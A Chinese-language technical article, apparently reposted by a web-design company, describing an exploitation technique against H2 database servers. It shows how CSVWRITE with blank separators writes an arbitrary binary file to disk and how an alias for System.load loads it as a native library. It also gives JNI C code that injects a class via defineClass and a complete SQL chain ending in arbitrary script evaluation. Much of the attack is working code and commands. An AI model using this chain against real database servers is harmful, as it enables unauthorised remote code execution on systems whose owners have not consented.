本篇文章給大家分享的是有關(guān)如何利用原生庫(kù)和JNI實(shí)現(xiàn)H2數(shù)據(jù)庫(kù)漏洞利用，小編覺(jué)得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

成都創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),華容企業(yè)網(wǎng)站建設(shè),華容品牌網(wǎng)站建設(shè),網(wǎng)站定制,華容網(wǎng)站建設(shè)報(bào)價(jià),網(wǎng)絡(luò)營(yíng)銷(xiāo),網(wǎng)絡(luò)優(yōu)化,華容網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競(jìng)爭(zhēng)力。可充分滿(mǎn)足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時(shí)我們時(shí)刻保持專(zhuān)業(yè)、時(shí)尚、前沿，時(shí)刻以成就客戶(hù)成長(zhǎng)自我，堅(jiān)持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實(shí)用型網(wǎng)站。

介紹

通過(guò)使用原生庫(kù)（.dll或.so）和Java原生接口（JNI），找到一種新的方法來(lái)執(zhí)行任意Java代碼，而無(wú)需在目標(biāo)服務(wù)器上使用Java編譯器。

H2 能力評(píng)估

假設(shè)我們不能使用CREATE ALIAS … AS … 命令，因?yàn)镴ava編譯器不可用。原因可能是它不是Java Development Kit（JDK）而是Java Runtime Environment（JRE），因此沒(méi)有編譯器。或是由于未正確設(shè)置PATH環(huán)境變量，導(dǎo)致無(wú)法找到Java編譯器javac。

但是，CREATE ALIAS … FOR …  命令可以使用：

當(dāng)引用一個(gè)方法時(shí)，類(lèi)必須已經(jīng)被編譯并包含在運(yùn)行數(shù)據(jù)庫(kù)的類(lèi)路徑中。僅支持靜態(tài)Java方法；類(lèi)和方法都必須是公共的。

因此各個(gè)公共靜態(tài)方法都可以使用。最壞的情況是，只有h3-1.2.141.jar和JRE可用。此外，只有受支持的數(shù)據(jù)類(lèi)型可用于嵌套函數(shù)調(diào)用。

在Java運(yùn)行時(shí)庫(kù)rt.jar中瀏覽candidates時(shí)，我們發(fā)現(xiàn)System.load(String)方法允許加載原生庫(kù)。這意味著我們可以通過(guò)庫(kù)的入口點(diǎn)函數(shù)來(lái)執(zhí)行代碼。

但如何將庫(kù)加載到H2服務(wù)器上呢？雖然Windows上的Java支持UNC路徑并提取文件，但其拒絕實(shí)際加載它。而且這在Linux上也不起作用。那么，如何將文件寫(xiě)入H2服務(wù)器呢？

使用 H2 寫(xiě)入任意文件

在查看和研究了一些H2函數(shù)后，我們發(fā)現(xiàn)了一個(gè)FILE_WRITE文件寫(xiě)入函數(shù)。不幸的是，F(xiàn)ILE_WRITE是在1.4.190中引入的。而我們需要的是在1.2.141中可用的函數(shù)。最終我們找到了一個(gè)名為CSVWRITE的函數(shù)，這也是唯一一個(gè)名稱(chēng)中帶“ write”的函數(shù)。

快速測(cè)試顯示了CSV列標(biāo)頭也被打印了出來(lái)。查看CSV選項(xiàng)，可以看到有一個(gè)writeColumnHeader選項(xiàng)可用于禁用寫(xiě)入列標(biāo)頭。不幸的是，writeColumnHeader選項(xiàng)僅被添加在了1.3/1.4.177上。

但是在查看其他受支持的選項(xiàng)fieldSeparator，fieldDelimiter，escape，null和lineSeparator時(shí)，我蹦出了一個(gè)想法：如果我們將它們?nèi)壳蹇眨⑹褂肅SV列標(biāo)頭寫(xiě)入我們的數(shù)據(jù)，會(huì)怎樣？如果H2數(shù)據(jù)庫(kù)引擎允許列具有任意長(zhǎng)度的任意名稱(chēng)，那么我們就能夠?qū)懭肴我鈹?shù)據(jù)。

查看H2的列語(yǔ)法，列的columnName可以是帶引號(hào)的名稱(chēng)，定義如下：

" anything " 
帶引號(hào)的名稱(chēng)區(qū)分大小寫(xiě)，并且可以包含空格。沒(méi)有最大名稱(chēng)長(zhǎng)度。兩個(gè)雙引號(hào)可用于在標(biāo)識(shí)符內(nèi)創(chuàng)建一個(gè)單雙引號(hào)。

這聽(tīng)起來(lái)很完美。讓我們看看我們是否可以在其中放入任意內(nèi)容，以及CSVWRITE是否具有二進(jìn)制安全機(jī)制。

首先，讓我們生成涵蓋所有8-bit octet的測(cè)試數(shù)據(jù)：

$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8  test.bin

現(xiàn)在我們生成一系列CHAR(n)函數(shù)調(diào)用，它們將在SQL查詢(xún)中生成我們的二進(jìn)制數(shù)據(jù)：

xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'

然后，我們?cè)谝韵翪SVWRITE調(diào)用中使用它：

SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');

最后，我們測(cè)試寫(xiě)入的文件是否具有相同的校驗(yàn)和：

C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.

可以看到，文件應(yīng)該是相同的！

進(jìn)入原生世界

既然我們可以使用內(nèi)置函數(shù)CSVWRITE，將原生庫(kù)寫(xiě)入磁盤(pán)并通過(guò)為System.load(String)創(chuàng)建別名來(lái)加載它，我們就可以使用庫(kù)的入口點(diǎn)來(lái)實(shí)現(xiàn)代碼執(zhí)行。

讓我們更進(jìn)一步，看看是否有辦法從SQL執(zhí)行任意命令/代碼。

Java Native Interface（JNI）允許原生代碼和Java虛擬機(jī)（JVM）之間的交互。因此，在這種情況下，它將允許我們與運(yùn)行H2數(shù)據(jù)庫(kù)的JVM進(jìn)行交互。

現(xiàn)在，我的想法是使用JNI通過(guò)ClassLoader.defineClass(byte[], int, int)將自定義Java類(lèi)注入到運(yùn)行的JVM中。這將允許我們創(chuàng)建一個(gè)別名并從SQL調(diào)用它。

使用 JNI 調(diào)用 JVM

首先，我們需要獲得正在運(yùn)行的JVM的句柄。這可以通過(guò)JNI_GetCreatedJavaVMs函數(shù)來(lái)完成。然后，將當(dāng)前線程附加到VM，并獲得JNI接口指針（JNIEnv）。 使用該指針，我們可以與JVM交互并調(diào)用JNI函數(shù)，例如FindClass, GetStaticMethodID/GetMethodID> 和 CallStatic<Type>Method/Call<Type>Method。 計(jì)劃是通過(guò)ClassLoader.getSystemClassLoader()獲取系統(tǒng)類(lèi)加載器并調(diào)用defineClass：

// xxd -p -c 10000 bin/JNIScriptEngine.class | sed -e 's/../0x&,/g' -e 's/^/char buf[] = {/' -e 's/,$/};/'
// public static JNIScriptEngine.eval(String js) : String
char buf[] = { /* ... */ };
size_t bufLen = sizeof(buf);
jbyteArray jData = (*g_env)->NewByteArray(g_env, bufLen);
(*g_env)->SetByteArrayRegion(g_env, jData, 0, bufLen, (jbyte*)buf);
JNIEnv * g_env;
JavaVM* g_vm;
jsize num_vms = 0;
jint result = JNI_GetCreatedJavaVMs(&g_vm, 1, &num_vms);
int getEnvStat = (*g_vm)->GetEnv(g_vm, (void **)&g_env, JNI_VERSION_1_6);
if (getEnvStat == JNI_EDETACHED) {
  // printf("GetEnv: not attached\n");
  if ((*g_vm)->AttachCurrentThread(g_vm, (void **) &g_env, NULL) != 0) {
    // printf("Failed to attach\n");
  }
} else if (getEnvStat == JNI_OK) {
  // printf("GetEnv: everything's fine\n");
} else if (getEnvStat == JNI_EVERSION) {
  // printf("GetEnv: version not supported\n");
}
jclass cls;
jmethodID meth;
jobject obj;
cls = (*g_env)->FindClass(g_env, "java/lang/ClassLoader");
// static java.lang.ClassLoader.getSystemClassLoader() : java.lang.ClassLoader
meth = (*g_env)->GetStaticMethodID(g_env, cls, "getSystemClassLoader", "()Ljava/lang/ClassLoader;");
jobject systemClassLoader = (*g_env)->CallStaticObjectMethod(g_env, cls, meth);
// java.lang.ClassLoader.defineClass(byte[], int, int) : java.lang.Class
meth = (*g_env)->GetMethodID(g_env, cls, "defineClass", "([BII)Ljava/lang/Class;");
jobject loadedClass = (*g_env)->CallObjectMethod(g_env, systemClassLoader, meth, jData, 0, (jint)bufLen);
(*g_env)->DeleteLocalRef(g_env, jData);
(*g_vm)->DetachCurrentThread(g_vm);

這基本上是模仿了以下Java代碼：

Class cls = Class.forName("java.lang.ClassLoader");
Method meth = cls.getDeclaredMethod("getSystemClassLoader", new Class[0]);
Object systemClassLoader = meth.invoke(null, new Object[0]);
meth = cls.getDeclaredMethod("defineClass", new Class[] { byte[].class, int.class, int.class });
meth.setAccessible(true);
meth.invoke(systemClassLoader, new Object[] { jData, 0, jData.length });

自定義Java類(lèi)JNIScriptEngine只有一個(gè)公共靜態(tài)方法，它使用可用的ScriptEngine實(shí)例評(píng)估傳遞的腳本：

public class JNIScriptEngine {
  public static String eval(String script) throws Exception {
    return new javax.script.ScriptEngineManager().getEngineFactories().get(0).getScriptEngine().eval(script).toString();
  }
}

最終，整合在一起的代碼如下：

-- write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', ... , '"'), 'ISO-8859-1', '', '', '', '', '');
-- load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('7*191');

這樣我們就可以從SQL執(zhí)行任意的JavaScript代碼了。

以上就是如何利用原生庫(kù)和JNI實(shí)現(xiàn)H2數(shù)據(jù)庫(kù)漏洞利用，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

分享標(biāo)題：如何利用原生庫(kù)和JNI實(shí)現(xiàn)H2數(shù)據(jù)庫(kù)漏洞利用
本文地址：http://www.chinadenli.net/article18/pgidgp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)頁(yè)設(shè)計(jì)公司、做網(wǎng)站、商城網(wǎng)站、域名注冊(cè)、企業(yè)網(wǎng)站制作、品牌網(wǎng)站設(shè)計(jì)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)